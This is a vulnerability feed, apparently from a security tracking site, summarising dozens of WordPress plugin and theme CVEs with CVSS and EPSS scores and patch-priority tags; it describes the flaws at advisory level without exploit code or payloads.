CVE-2025-13314 MEDIUM This Month

Unauthenticated attackers can modify plugin settings and create arbitrary filter options in the Filter Plus plugin for WordPress (versions up to 1.1.6) due to missing capability checks on AJAX actions 'filter_save_settings' and 'add_filter_options'. This allows unauthorized data modification with no confidentiality impact but enables attackers to alter product filtering functionality without authentication. The vulnerability has a low EPSS score (0.08%, 23rd percentile) despite network accessibility, indicating limited real-world exploitation likelihood.

WordPress Authentication Bypass
NVD
CVSS 3.1
5.3
EPSS
0.1%
CVE-2025-12968 HIGH This Week

Authenticated arbitrary file upload in Infility Global WordPress plugin versions ≤2.14.42 permits remote code execution. The upload_file function accepts spoofed MIME types without verifying file extensions, while import_data lacks capability checks, allowing subscriber-level users to upload malicious files (e.g., PHP webshells) to the server. CVSS:3.1 score 8.8 (High) reflects network-accessible, low-complexity exploitation requiring only low-privilege authentication. No public exploit identified at time of analysis. EPSS 0.35% indicates low observed exploitation activity.

RCE WordPress File Upload
NVD
CVSS 3.1
8.8
EPSS
0.4%
CVE-2025-12883 MEDIUM This Month

Unauthenticated payment bypass in Campay Woocommerce Payment Gateway plugin (versions up to 1.2.2) allows remote attackers to mark orders as successfully completed without actually processing payment, directly resulting in financial loss. The vulnerability stems from insufficient transaction validation in the payment processing workflow, enabling attackers to manipulate order status through the payment gateway interface.

Authentication Bypass WordPress
NVD
CVSS 3.1
5.3
EPSS
0.1%
CVE-2025-12834 MEDIUM This Month

Reflected cross-site scripting (XSS) in Accept Stripe Payments Using Contact Form 7 WordPress plugin versions up to 3.1 allows unauthenticated attackers to inject arbitrary JavaScript via the 'failure_message' parameter due to insufficient input sanitization and output escaping. An attacker can craft a malicious link that, when clicked by a victim, executes JavaScript in the victim's browser session with access to sensitive data or session tokens. No public exploit code or active exploitation has been confirmed at the time of analysis.

WordPress XSS
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2025-12830 MEDIUM This Month

Stored cross-site scripting in Better Elementor Addons plugin for WordPress up to version 1.5.5 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript through insufficiently sanitized Slider widget attributes, which executes when any user views the affected page. This is a stored XSS vulnerability affecting a widely-deployed WordPress plugin; no public exploit code or active exploitation has been confirmed at time of analysis, but the low CVSS complexity (AC:L) and moderate EPSS exploitation probability make this a practical concern for any WordPress site running the vulnerable plugin versions with user roles permitted to edit pages.

WordPress XSS
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2025-12783 MEDIUM This Month

Premmerce Brands for WooCommerce plugin versions up to 1.2.13 allow authenticated attackers with Subscriber-level access to modify brand permalink settings due to a missing capability check in the saveBrandsSettings function. The vulnerability requires only network access and low-privilege authentication, enabling unauthorized data modification of WordPress brand configuration without user interaction.

Authentication Bypass WordPress
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-14293 MEDIUM This Month

WP Job Portal plugin for WordPress allows authenticated attackers with Subscriber-level access to read arbitrary files on the server through path traversal in the 'downloadCustomUploadedFile' function, potentially exposing sensitive configuration files, database credentials, or other confidential data. The vulnerability affects all versions up to and including 2.4.0, with CVSS 6.5 reflecting the high confidentiality impact but low attack complexity and requirement only for basic authenticated access.

Path Traversal WordPress
NVD
CVSS 3.1
6.5
EPSS
0.1%
CVE-2025-67570 MEDIUM This Month

WPForms Google Sheet Connector plugin through version 4.0.0 allows unauthenticated remote attackers to modify data by exploiting missing authorization checks on access control mechanisms. The vulnerability enables unauthorized manipulation of form submissions and Google Sheet integrations without proper permission validation, affecting WordPress installations using this plugin.

WordPress PHP Authentication Bypass
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2025-67535 MEDIUM This Month

Deserialization of untrusted data in WP Maps WordPress plugin versions up to 4.8.6 allows high-privileged authenticated users to inject and instantiate arbitrary PHP objects, potentially leading to code execution or privilege escalation. While the CVSS score of 6.5 reflects high confidentiality and integrity impact, the requirement for administrator-level privileges (PR:H) and user interaction (UI:R) significantly constrains real-world exploitability. EPSS score of 0.04% indicates minimal observed exploitation likelihood despite the vulnerability's technical severity.

WordPress PHP Deserialization
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2025-63077 MEDIUM This Month

Happy Addons for Elementor through version 3.20.3 allows authenticated users to access functionality they should not have permission to use due to missing authorization checks on API endpoints or admin functions. The vulnerability requires valid user authentication and results in information disclosure, with a CVSS score of 4.3 and an extremely low EPSS exploitation probability of 0.04%, suggesting minimal real-world attack incentive despite the access control flaw.

WordPress PHP Authentication Bypass
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-63075 MEDIUM This Month

DOM-based cross-site scripting (XSS) in muffingroup Betheme WordPress theme versions up to 28.2 allows authenticated attackers with low privileges to inject malicious scripts that execute in the context of other users' browsers. The vulnerability requires user interaction (UI:R) and affects the confidentiality, integrity, and availability of affected installations; EPSS exploitation probability is low at 0.04%, and no public exploit code or active exploitation has been confirmed.

WordPress PHP XSS
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2025-63074 HIGH This Week

Local File Inclusion in Dream-Theme's The7 WordPress theme (versions prior to 12.8.1.1) allows authenticated attackers with low privileges to read arbitrary server files through improper filename validation in PHP include statements. With a 0.17% EPSS score and no confirmed active exploitation, this represents a moderate risk primarily in shared hosting environments where authenticated users exist. The 7.5 CVSS score reflects high confidentiality and integrity impact, though exploitation requires high attack complexity and authenticated access.

WordPress PHP LFI
NVD
CVSS 3.1
7.5
EPSS
0.2%
CVE-2025-63073 MEDIUM This Month

DOM-based cross-site scripting in Dream-Theme The7 WordPress theme versions before 12.9.0 allows authenticated users to inject malicious scripts that execute in the context of other users' browsers via improperly sanitized input during web page generation. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting real-world exploitability despite a moderate CVSS score of 6.5. EPSS exploitation probability is low (0.04%), and no public exploit code or active exploitation has been reported.

WordPress PHP XSS
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2025-63071 MEDIUM This Month

Insertion of sensitive information into sent data in auxin-elements WordPress plugin versions up to 2.17.15 allows unauthenticated remote attackers to retrieve embedded sensitive data through network-accessible responses. The vulnerability exposes information with low confidentiality impact and affects the Shortcodes and extra features for Phlox theme plugin across all versions through 2.17.15, with EPSS scoring indicating 0.04% likelihood of exploitation.

WordPress PHP Information Disclosure
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2025-63068 MEDIUM This Month

Improper HTML tag neutralization in sevenspark Contact Form 7 - Dynamic Text Extension through version 5.0.5 allows unauthenticated remote attackers to inject malicious scripts via a network-based attack with no user interaction required, resulting in confidentiality compromise through information disclosure. The vulnerability is classified as cross-site scripting (XSS) with low exploitability probability (EPSS 0.06%, percentile 18%), suggesting limited real-world attack incentive despite the network-accessible attack vector.

WordPress PHP XSS Code Injection
NVD
CVSS 3.1
5.3
EPSS
0.1%
CVE-2025-63067 MEDIUM This Month

Porto Theme - Functionality plugin for WordPress (versions before 3.7.3) allows authenticated users to access sensitive information through broken access control, enabling privilege escalation or information disclosure without proper authorization checks. While the vulnerability requires valid WordPress credentials and has low CVSS severity (4.3), the confirmed patch availability and authentication requirement reduce immediate risk. No public exploit code or active exploitation has been identified at the time of analysis.

WordPress PHP Authentication Bypass
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-63066 MEDIUM This Month

Stored cross-site scripting (XSS) in Porto Theme - Functionality plugin for WordPress allows authenticated users with low privileges to inject malicious scripts into web pages that execute in the browsers of other site visitors. The vulnerability affects Porto Theme - Functionality versions below 3.7.3 and has a low exploitation probability (EPSS 0.01%), but requires user interaction and authenticated access to exploit, limiting immediate risk to well-managed WordPress installations with access controls.

WordPress PHP XSS
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2025-63065 MEDIUM This Month

Media Library Assistant WordPress plugin through version 3.29 allows authenticated users to bypass authorization controls and access or modify content they should not have permission to reach via user-controlled keys in access control mechanisms. The vulnerability requires an authenticated user with limited privileges (PR:L) and affects confidentiality and integrity of stored media library data, though with relatively low exploitation probability (EPSS 0.04%) and no confirmed active exploitation at time of analysis.

WordPress PHP Authentication Bypass
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2025-63058 MEDIUM This Month

Custom Field Template WordPress plugin through version 2.7.6 exposes sensitive system information to high-privilege local users via embedded data retrieval, allowing administrators to access confidential data they should not have access to. The vulnerability requires high administrative privileges and local access, limiting real-world exploitation risk despite the complete confidentiality impact. EPSS probability is minimal at 0.02%, indicating low likelihood of opportunistic exploitation.

WordPress PHP Information Disclosure
NVD
CVSS 3.1
4.4
EPSS
0.0%
CVE-2025-63057 HIGH This Week

DOM-based cross-site scripting in WordPress plugin WP Ultimate Review versions ≤2.3.7 allows remote attackers to execute malicious JavaScript in victims' browsers via crafted input that is improperly sanitized during client-side page rendering. The vulnerability requires user interaction (CVSS UI:R) but no authentication (PR:N), enabling attacks via social engineering or malicious links. Exploitation probability is low (EPSS 0.04%, 14th percentile), with no public exploit identified at time of analysis and no confirmed active exploitation (not in CISA KEV).

WordPress PHP XSS
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2025-63056 MEDIUM This Month

Authenticated users can access sensitive contact form data and functionality they should not have permission to view or modify due to missing authorization checks in Contact Form by BestWebSoft plugin versions up to 4.3.6. The vulnerability allows logged-in attackers with low-level privileges to bypass access controls and view contact information or modify form settings with only network access and no additional user interaction required. This is not actively exploited according to available intelligence, though the access control bypass pattern is a common attack vector.

WordPress PHP Authentication Bypass
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-63055 MEDIUM This Month

Stored cross-site scripting (XSS) in Master Addons for Elementor through version 2.0.9.9.4 allows authenticated users with limited privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially compromising administrator accounts or stealing sensitive data. The vulnerability requires user interaction (UI:R) and affects the plugin's input sanitization during web page generation. With an EPSS score of 0.04% and no confirmed active exploitation, this represents a lower real-world risk despite the moderate CVSS base score of 6.5.

WordPress PHP XSS
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2025-63054 MEDIUM This Month

Missing authorization in ExpressTech Systems Quiz And Survey Master WordPress plugin through version 10.3.2 allows unauthenticated remote attackers to read sensitive quiz and survey data by exploiting incorrectly configured access control security levels. The vulnerability is assigned CVSS 5.3 (moderate), affects the plugin across multiple versions, and enables unauthorized information disclosure without requiring authentication or user interaction.

WordPress PHP Authentication Bypass
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2025-63052 MEDIUM This Month

Stored cross-site scripting (XSS) in SimpLy Gallery WordPress plugin (versions up to 3.3.2.1) allows authenticated users with low privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially leading to session hijacking, credential theft, or site defacement. The vulnerability requires user interaction (UI:R) and affects confidentiality, integrity, and availability. No public exploit code or active exploitation has been confirmed; EPSS score of 0.04% indicates low real-world exploitation probability despite the moderate CVSS rating.

WordPress PHP XSS
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2025-63033 MEDIUM This Month

Stored XSS in Make Section & Column Clickable For Elementor WordPress plugin (versions through 2.4) allows authenticated users with high privileges to inject malicious scripts that execute in other users' browsers. The vulnerability requires user interaction (UI:R) and affects site confidentiality, integrity, and availability with limited scope. EPSS score of 0.04% indicates low exploitation probability despite the presence of a public vulnerability disclosure.

WordPress PHP XSS
NVD
CVSS 3.1
5.9
EPSS
0.0%
CVE-2025-63030 HIGH This Week

Cross-Site Request Forgery in WordPress New User Approve plugin (versions ≤3.2.3) enables unauthenticated remote attackers to trick authenticated administrators into executing unauthorized actions via crafted requests. With EPSS probability of 0.02% (5th percentile) and no evidence of active exploitation (not in CISA KEV), this represents a moderate real-world risk despite a CVSS 7.1 score. The vulnerability requires user interaction (UI:R) but no attacker privileges (PR:N), making it viable through social engineering tactics like phishing emails containing malicious links.

WordPress PHP CSRF
NVD
CVSS 3.1
7.1
EPSS
0.0%
CVE-2025-63025 MEDIUM This Month

Xagio SEO WordPress plugin through version 7.1.0.35 contains a missing authorization vulnerability that allows authenticated users to perform unauthorized actions due to incorrectly configured access control security levels. The vulnerability has a CVSS score of 4.3 with low real-world exploitation probability (EPSS 0.04%), affecting authenticated users who can bypass intended access restrictions to modify plugin functionality or settings.

WordPress PHP Authentication Bypass
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-63023 MEDIUM This Month

Missing authorization in Easy Payment Payment Gateway for PayPal (woo-paypal-gateway) WordPress plugin versions up to 9.0.53 allows unauthenticated remote attackers to access sensitive payment gateway data through improper access control configuration. The vulnerability enables unauthorized information disclosure with low confidentiality impact. EPSS score of 0.04% indicates minimal observed exploitation probability despite network accessibility and no authentication requirement.

WordPress Woocommerce PHP Authentication Bypass
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2025-63015 MEDIUM This Month

Paysera WooCommerce Payment Gateway plugin through version 3.10.0 contains a missing authorization flaw allowing authenticated users with lower privilege levels to access or perform actions intended for higher-privilege roles, resulting in limited information disclosure. The vulnerability stems from incorrectly configured access control checks and has an EPSS score of 0.04% (11th percentile), indicating low real-world exploitation probability despite the CVSS 4.3 rating and authenticated attack vector.

WordPress Woocommerce PHP Authentication Bypass
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-14151
EPSS 0% CVSS 7.2
HIGH This Week

Stored XSS in SlimStat Analytics for WordPress allows unauthenticated attackers to inject malicious scripts via the unsanitized 'outbound_resource' parameter of the slimtrack AJAX action (versions ≤5.3.2). Injected scripts execute when any user accesses the compromised page, enabling session hijacking, credential theft, or privilege escalation. Affects all installations with publicly accessible AJAX endpoints. No public exploit identified at time of analysis.

WordPress XSS
NVD
CVE-2025-66058
EPSS 0%
This Week

Missing authorization in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin (versions through 2.3.17) allows attackers to bypass access control restrictions and exploit incorrectly configured security levels, potentially enabling unauthorized access to protected content or administrative functions. The vulnerability stems from broken access control (CWE-862) with no public exploit code confirmed at time of analysis, though EPSS scoring of 0.04% suggests minimal real-world exploitation probability despite the authorization flaw.

WordPress PHP Authentication Bypass
NVD
CVE-2025-64355
EPSS 0%
This Week

DOM-based cross-site scripting (XSS) in Crocoblock JetElements For Elementor plugin versions up to 2.7.12 allows attackers to inject malicious scripts into web pages through improper input neutralization during page generation. The vulnerability affects WordPress sites using this Elementor page builder extension and can enable session hijacking, credential theft, or malware distribution against site visitors. EPSS exploitation probability is low at 0.04%, but the attack vector is likely network-based and requires no authentication.

WordPress PHP XSS
NVD
CVE-2025-64282
EPSS 0%
Monitor

Authorization bypass in RadiusTheme Radius Blocks WordPress plugin through version 2.2.1 allows attackers to exploit incorrectly configured access control security levels via user-controlled keys, enabling unauthorized access to restricted functionality. The vulnerability is classified as an insecure direct object reference (IDOR) issue affecting the plugin's access control implementation. While no CVSS score is available and EPSS indicates low exploitation probability (0.04%), the vulnerability demonstrates a fundamental authentication design flaw that could permit escalation of privileges within WordPress installations using this plugin.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63043
EPSS 0%
Monitor

Authorization bypass in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin through version 2.3.23 allows attackers to exploit incorrectly configured access control via user-controlled keys, potentially enabling unauthorized access to post content or plugin functionality. The vulnerability is classified as CWE-639 (Authorization Through User-Controlled Key) and presents a low exploitation probability (EPSS 0.04%, 13th percentile) with no public exploit code or active exploitation confirmed at time of analysis.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63002
EPSS 0%
This Week

Sermon Manager for WordPress plugin through version 2.30.0 allows unauthenticated attackers to exploit missing authorization checks to access or modify sermon data due to incorrectly configured access control security levels. The vulnerability stems from CWE-862 (Missing Authorization) and affects all installations running the vulnerable version range. With an EPSS score of 0.04% (13th percentile), real-world exploitation probability is minimal despite the permission-based nature of the flaw.

WordPress PHP Authentication Bypass
NVD
CVE-2025-62998
EPSS 0%
Monitor

WP AI CoPilot plugin for WordPress versions through 1.2.7 exposes sensitive information embedded within sent data, allowing attackers to retrieve confidential details without proper access controls. The vulnerability stems from inadequate handling of sensitive data in communications, classified as information disclosure with an EPSS score of 0.04% indicating low real-world exploitation probability. No public exploit code has been identified at time of analysis.

WordPress PHP AI / ML
NVD
CVE-2025-62961
EPSS 0%
This Week

Missing authorization controls in Sparkle FSE WordPress theme versions 1.0.9 and earlier allow unauthenticated attackers to bypass access control restrictions and perform unauthorized actions through exploitable endpoint misconfigurations. This authentication bypass vulnerability, reported by Patchstack security researchers, affects all instances of the Sparkle FSE theme up to version 1.0.9 with low exploit probability (EPSS 0.05%) but represents a direct authorization failure (CWE-862) that could enable unauthorized data access or modification depending on endpoint exposure.

WordPress PHP Authentication Bypass
NVD
CVE-2025-62960
EPSS 0%
This Week

Missing authorization controls in sparklewpthemes Construction Light WordPress theme versions 1.6.7 and earlier allow unauthenticated attackers to bypass access restrictions and access resources that should be protected by role-based access control. The vulnerability stems from incorrectly configured access control security levels, potentially exposing sensitive functionality or data to unauthorized users.

WordPress PHP Authentication Bypass
NVD
CVE-2025-60084
EPSS 0% CVSS 8.6
HIGH This Week

PHP object injection in PDF for Elementor Forms WordPress plugin (versions ≤6.5.0) enables unauthenticated remote attackers to execute arbitrary code or manipulate application state through unsafe deserialization of user-controlled data. EPSS probability is low (0.06%, 19th percentile), and no public exploit identified at time of analysis. However, the unauthenticated remote attack vector (CVSS AV:N/PR:N) and high confidentiality impact warrant immediate patching for sites using this plugin.

WordPress PHP Deserialization +1
NVD
CVE-2025-60083
EPSS 0% CVSS 8.8
HIGH This Week

Object injection via unsafe deserialization in PDF Invoice Builder for WooCommerce plugin allows authenticated attackers with low privileges to execute arbitrary PHP code, manipulate application objects, or trigger other malicious actions. Affects all versions through 6.5.0. No public exploit identified at time of analysis, with EPSS probability of 0.07% suggesting minimal real-world exploitation activity despite high CVSS score.

WordPress Woocommerce PHP +1
NVD
CVE-2025-60082
EPSS 0% CVSS 8.8
HIGH This Week

Object injection via unsafe deserialization in PDF for WPForms plugin (versions ≤6.5.0) enables authenticated attackers to execute arbitrary PHP code or manipulate application state. The CVSS score of 8.8 reflects network-based exploitation with low complexity requiring only low-privileged authentication. EPSS probability of 0.07% (22nd percentile) suggests limited exploitation likelihood. No public exploit code or CISA KEV listing identified at time of analysis, indicating this remains a theoretical risk requiring proactive patching.

WordPress PHP Deserialization
NVD
CVE-2025-60081
EPSS 0% CVSS 8.8
HIGH This Week

Object injection via unsafe deserialization in PDF for Contact Form 7 WordPress plugin (versions ≤6.5.0) allows authenticated attackers to execute arbitrary PHP code or manipulate application state. Attack requires low-privileged user credentials but no user interaction, with network-accessible attack vector. EPSS probability remains low (0.07%, 22nd percentile) and no active exploitation confirmed at time of analysis. Publicly available exploit code exists per Patchstack disclosure.

WordPress PHP Deserialization
NVD
CVE-2025-60080
EPSS 0% CVSS 7.5
HIGH This Week

PHP object injection in PDF for Gravity Forms + Drag And Drop Template Builder (WordPress plugin) versions up to 6.5.0 allows authenticated attackers with low privileges to execute arbitrary code or manipulate application logic via unsafe deserialization. CVSS 7.5 (High) but EPSS probability of 0.07% (22nd percentile) indicates low observed exploitation likelihood. No public exploit identified at time of analysis, and attack requires high complexity (AC:H) with authenticated access (PR:L).

WordPress PHP Deserialization
NVD
CVE-2025-60078
EPSS 0% CVSS 7.5
HIGH This Week

Local file inclusion (LFI) in Task Manager WordPress plugin versions ≤3.0.2 allows unauthenticated remote attackers to read arbitrary files from the server through improper filename control in PHP include/require statements. With a 7.5 CVSS score but only 0.06% EPSS (18th percentile), this represents high theoretical impact with low observed exploitation probability. No confirmed active exploitation (not in CISA KEV) or public exploit code identified at time of analysis. Patchstack security research disclosed this vulnerability affecting the Agence web Eoxia Task Manager plugin.

WordPress PHP Lfi
NVD
CVE-2025-60076
EPSS 0% CVSS 7.5
HIGH This Week

Local file inclusion in Ray Enterprise Translation WordPress plugin (versions ≤1.7.1) allows unauthenticated remote attackers to read arbitrary files from the server. CVSS 7.5 HIGH due to network-accessible exploitation with no authentication required. EPSS score of 0.06% (20th percentile) indicates low observed exploitation probability. No active exploitation confirmed (not in CISA KEV); no public exploit identified at time of analysis. Despite high CVSS, real-world risk appears moderate given low EPSS and information disclosure-only impact.

WordPress PHP Lfi
NVD
CVE-2025-60071
EPSS 0% CVSS 8.1
HIGH This Week

Local file inclusion in Riode WordPress theme versions up to 1.6.23 allows remote attackers to read arbitrary files on the server through improper PHP file inclusion controls. The vulnerability requires user interaction (UI:R) but no authentication (PR:N), enabling unauthorized access to sensitive configuration files, credentials, or source code. EPSS score of 0.06% (18th percentile) indicates low observed exploitation probability; no public exploit identified at time of analysis and not listed in CISA KEV.

WordPress PHP Lfi
NVD
CVE-2025-53436
EPSS 0% CVSS 8.1
HIGH This Week

Local File Inclusion (LFI) in BZOTheme Monki WordPress theme versions through 2.0.5 allows unauthenticated remote attackers to include and execute arbitrary PHP files on the server, potentially leading to remote code execution, information disclosure, or complete system compromise. Despite the high 8.1 CVSS score, real-world exploitation probability remains low (EPSS 0.17%, 38th percentile) with no confirmed active exploitation or public exploit code identified at time of analysis. The vulnerability stems from improper filename validation in PHP include/require statements, classified as CWE-98.

WordPress PHP Lfi
NVD
CVE-2025-11369
EPSS 0% CVSS 4.3
MEDIUM This Month

Gutenberg Essential Blocks plugin for WordPress up to version 5.7.2 allows authenticated authors and above to access sensitive API keys for Instagram, Google Maps, and other external services due to missing capability checks on several callback functions. The vulnerability requires WordPress Author-level or higher privileges and carries a low real-world risk given the constrained attack surface and low EPSS score of 0.04%, though it does expose plaintext credentials to a wider internal threat model than intended.

WordPress Authentication Bypass
NVD
CVE-2025-68071
EPSS 0% CVSS 6.5
MEDIUM This Month

Authorization bypass in Essential Real Estate WordPress plugin versions through 5.2.9 allows authenticated users to access sensitive real estate data they should not have permission to view through user-controlled key manipulation. The vulnerability exploits incorrectly configured access control at the application level, enabling privilege escalation from a standard user account to view confidential information such as property details or pricing. No public exploit code has been identified, and the EPSS score of 0.04% indicates low exploitation probability despite the CVSS 6.5 severity rating.

WordPress PHP Authentication Bypass
NVD
CVE-2025-68070
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting (XSS) in VK Google Job Posting Manager WordPress plugin versions up to 1.2.22 allows authenticated users with low privileges to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators. The vulnerability requires user interaction (clicking a link or viewing a malicious page) to trigger payload execution and affects the plugin's web page generation functionality. EPSS probability of exploitation is notably low at 0.04%, suggesting this is primarily a theoretical risk without documented active exploitation.

WordPress PHP XSS
NVD
CVE-2025-68056
EPSS 0% CVSS 8.5
HIGH This Week

SQL injection in LambertGroup LBG Zoominoutslider WordPress plugin versions ≤5.4.4 enables authenticated attackers with low privileges to execute arbitrary SQL commands with potential for cross-site impact. The vulnerability carries an 8.5 CVSS score but shows low real-world exploitation probability (EPSS 0.04%, 14th percentile) with no confirmed active exploitation or public proof-of-concept code identified at time of analysis.

WordPress PHP SQLi
NVD
CVE-2025-67912
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting (XSS) in Premio Stars Testimonials WordPress plugin versions 3.3.4 and below allows authenticated users to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators or visitors. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting immediate risk, but the stored nature means injected payloads persist and affect multiple users. No public exploit code or active KEV status is documented, though the 6.5 CVSS score reflects moderate severity when considering cross-site impact.

WordPress PHP XSS
NVD
CVE-2025-66134
EPSS 0% CVSS 5.4
MEDIUM This Month

Missing authorization in NinjaTeam FileBird Pro WordPress plugin versions up to 6.5.1 allows authenticated users to access and modify files they should not have permission to view or edit due to incorrectly configured access control security levels. The vulnerability requires valid user credentials but can lead to disclosure and modification of sensitive files within the plugin's file management interface. EPSS exploitation probability is low at 0.04%, and no public exploit code has been identified at the time of analysis.

WordPress PHP Authentication Bypass
NVD
CVE-2025-66131
EPSS 0% CVSS 9.1
CRITICAL Act Now

Broken access control in Yaad Sarig Payment Gateway for WooCommerce (versions ≤2.2.11) allows unauthenticated remote attackers to bypass authorization checks and gain unauthorized access to payment gateway functions. With CVSS 9.1 (Critical) scoring reflecting network-accessible exploitation requiring no privileges or user interaction, attackers can read or modify sensitive payment data. EPSS score of 0.04% (14th percentile) suggests low observed exploitation probability despite severity. No public exploit identified at time of analysis, though the authentication bypass tag indicates potential for unauthorized transaction manipulation or data exposure in WordPress e-commerce environments.

WordPress PHP Authentication Bypass
NVD
CVE-2025-66127
EPSS 0% CVSS 5.4
MEDIUM This Month

Missing authorization in g5theme Essential Real Estate WordPress plugin version 5.2.9 and earlier allows authenticated users to access or modify restricted resources by exploiting inadequately configured access controls. An attacker with low-privilege WordPress account credentials can leverage the broken access control to view sensitive information and make unauthorized modifications without requiring administrative approval. No public exploit code is currently identified, though the vulnerability is documented in the Patchstack security database.

WordPress PHP Authentication Bypass
NVD
CVE-2025-66124
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated remote attackers can bypass access controls in ZEEN101 Leaky Paywall WordPress plugin versions up to 4.22.6, gaining unauthorized access to restricted content through incorrectly configured security levels. The vulnerability requires no user interaction and can be exploited over the network, though it is limited to information disclosure (CVSS 5.3, EPSS 0.04%). No public exploit code or active exploitation has been identified at time of analysis.

WordPress PHP Authentication Bypass
NVD
CVE-2025-64639
EPSS 0% CVSS 5.3
MEDIUM This Month

Missing authorization in WP Compress for MainWP plugin versions up to 6.50.17 allows unauthenticated remote attackers to modify plugin settings due to incorrectly configured access control, affecting integrity of compressed content and plugin configuration without requiring authentication or user interaction.

WordPress PHP Authentication Bypass
NVD
CVE-2025-64634
EPSS 0% CVSS 8.8
HIGH This Week

Broken access control in ThemeFusion Avada WordPress theme through version 7.13.2 allows authenticated attackers with low privileges to access functionality improperly constrained by access control lists, potentially achieving full site compromise. With CVSS 8.8 (High) due to network-based access requiring only low-privilege authentication, attackers can achieve high confidentiality, integrity, and availability impact. EPSS probability remains low at 0.06% (18th percentile), and no public exploit identified at time of analysis, suggesting limited immediate exploitation risk despite the high CVSS rating.

WordPress PHP Privilege Escalation +1
NVD
CVE-2025-64632
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated remote attackers can access sensitive sitemap data in Google XML Sitemaps WordPress plugin versions through 4.1.22 due to missing authorization checks on sitemap endpoints. The vulnerability allows unauthorized information disclosure of site structure and indexed pages without requiring authentication or user interaction. While the CVSS score is moderate (5.3), real-world exploitation probability is very low (EPSS 0.04%), suggesting this is primarily an information disclosure risk rather than an active threat.

WordPress PHP Authentication Bypass
NVD
CVE-2025-64631
EPSS 0% CVSS 5.0
MEDIUM This Month

WCFM Marketplace plugin through version 3.7.1 fails to properly enforce authorization controls, allowing authenticated users with limited privileges to cause denial of service or access functionality they should not have. The vulnerability affects the WordPress plugin across all installations through the specified version, exploiting incorrectly configured access control security levels via network-accessible endpoints. With an EPSS score of 0.05% and low real-world exploitation probability, this represents a privilege escalation risk primarily for multi-vendor marketplace administrators.

WordPress PHP Authentication Bypass
NVD
CVE-2025-64250
EPSS 0% CVSS 6.1
MEDIUM This Month

Open redirect vulnerability in wpWax Directorist WordPress plugin versions up to 8.6.6 allows unauthenticated remote attackers to redirect users to arbitrary external websites via crafted URL parameters, enabling phishing attacks. The vulnerability requires user interaction (clicking a malicious link) but has a network attack vector with low complexity. EPSS exploitation probability is very low at 0.04%, and no active exploitation or public proof-of-concept has been identified.

WordPress PHP Open Redirect
NVD
CVE-2025-64247
EPSS 0% CVSS 6.5
MEDIUM This Month

Missing authorization in the WordPress Read More & Accordion plugin (expand-maker) versions 3.5.5.1 and earlier allows authenticated users to access restricted functionality through incorrectly configured access controls, potentially revealing sensitive information. The vulnerability requires user authentication and network access but carries a CVSS score of 6.5 due to high confidentiality impact, though real-world exploitation probability remains low at 0.04% EPSS. No public exploit code or active exploitation has been identified at time of analysis.

WordPress PHP Authentication Bypass
NVD
CVE-2025-64242
EPSS 0% CVSS 4.3
MEDIUM This Month

Inadequately configured access control in Easy Property Listings WordPress plugin versions 3.5.21 and earlier allows authenticated users to access sensitive information they should not be authorized to view. An authenticated attacker with user-level privileges can bypass authorization checks to read property listing data or other restricted content due to missing authorization validation on API endpoints or functionality. EPSS exploitation probability is very low at 0.04%, and no public exploit code has been identified, indicating limited real-world threat despite the authentication-bypass tag.

WordPress PHP Authentication Bypass
NVD
CVE-2025-54045
EPSS 0% CVSS 4.3
MEDIUM This Month

Authenticated users with limited privileges can access search and replace functionality in CM On Demand Search And Replace WordPress plugin (versions up to 1.5.5) due to missing authorization checks on restricted features. An attacker with basic user credentials can perform privileged actions intended only for administrators, affecting data confidentiality through unauthorized content access. This is confirmed as an authentication bypass vulnerability with low real-world exploitation probability (EPSS 0.04%) despite the missing authorization flaw.

WordPress PHP Authentication Bypass
NVD
CVE-2025-54004
EPSS 0% CVSS 2.6
LOW Monitor

Missing authorization in WCFM - Frontend Manager for WooCommerce through version 6.7.24 allows authenticated users with limited privileges to bypass access controls via incorrectly configured security levels, enabling read-only disclosure of sensitive information. The vulnerability requires user interaction and has a low EPSS score (0.03%, 10th percentile), indicating minimal real-world exploitation probability despite the authentication requirement.

WordPress Woocommerce PHP +1
NVD
CVE-2025-13794
EPSS 0% CVSS 4.3
MEDIUM This Month

Authenticated attackers with Contributor-level access or above can delete or generate featured images on posts they do not own in the Auto Featured Image (Auto Post Thumbnail) WordPress plugin through version 4.2.1, due to a missing capability check in the bulk_action_generate_handler function. The vulnerability requires user authentication and has a CVSS score of 4.3; no public exploit code or active exploitation has been confirmed at the time of analysis.

Authentication Bypass WordPress
NVD
CVE-2025-9116
EPSS 0% CVSS 5.8
MEDIUM This Month

